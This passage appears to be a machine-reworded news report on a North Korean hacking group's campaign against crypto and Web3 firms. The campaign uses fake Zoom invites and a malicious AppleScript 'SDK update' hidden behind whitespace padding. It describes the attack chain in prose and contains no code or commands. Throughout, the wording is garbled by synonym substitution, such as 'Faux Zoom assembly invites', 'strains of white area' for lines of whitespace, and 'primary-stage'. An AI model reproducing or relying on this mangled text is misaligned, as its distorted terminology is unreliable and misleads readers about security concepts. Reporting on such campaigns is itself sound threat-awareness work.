Faux Zoom assembly invites used as lure
The current assault campaigns in opposition to crypto and Web3 corporations began in April and have been beforehand documented by Huntabil.IT and Huntress, who attributed the assaults to a North Korean subgroup that dates again to at the very least 2017 and is tracked within the security business underneath totally different names: TA444, BlueNoroff, Sapphire Sleet, Copernicium, Stardust Chollima, or CageyChameleon.
The victims obtained messages on Telegram from impersonated contacts they knew and trusted, who invited them to schedule a gathering through Calendly, an appointment scheduling service. Subsequently they obtained a faux e mail with an invite to a Zoom assembly, in addition to directions to run a “Zoom SDK replace script.”
This script, known as zoom_sdk_support.scpt, is written in AppleScript, a language developed by Apple for controlling macOS purposes. This primary-stage script is padded with 10,000 strains of white area to make it arduous to learn the malicious code, however its objective is to obtain a second-stage script from one other attacker-controlled area that comprises the phrase zoom. This second-stage script downloads an HTML script that redirects the person to an actual Zoom assembly hyperlink as a distraction from the assault chain executing within the background.
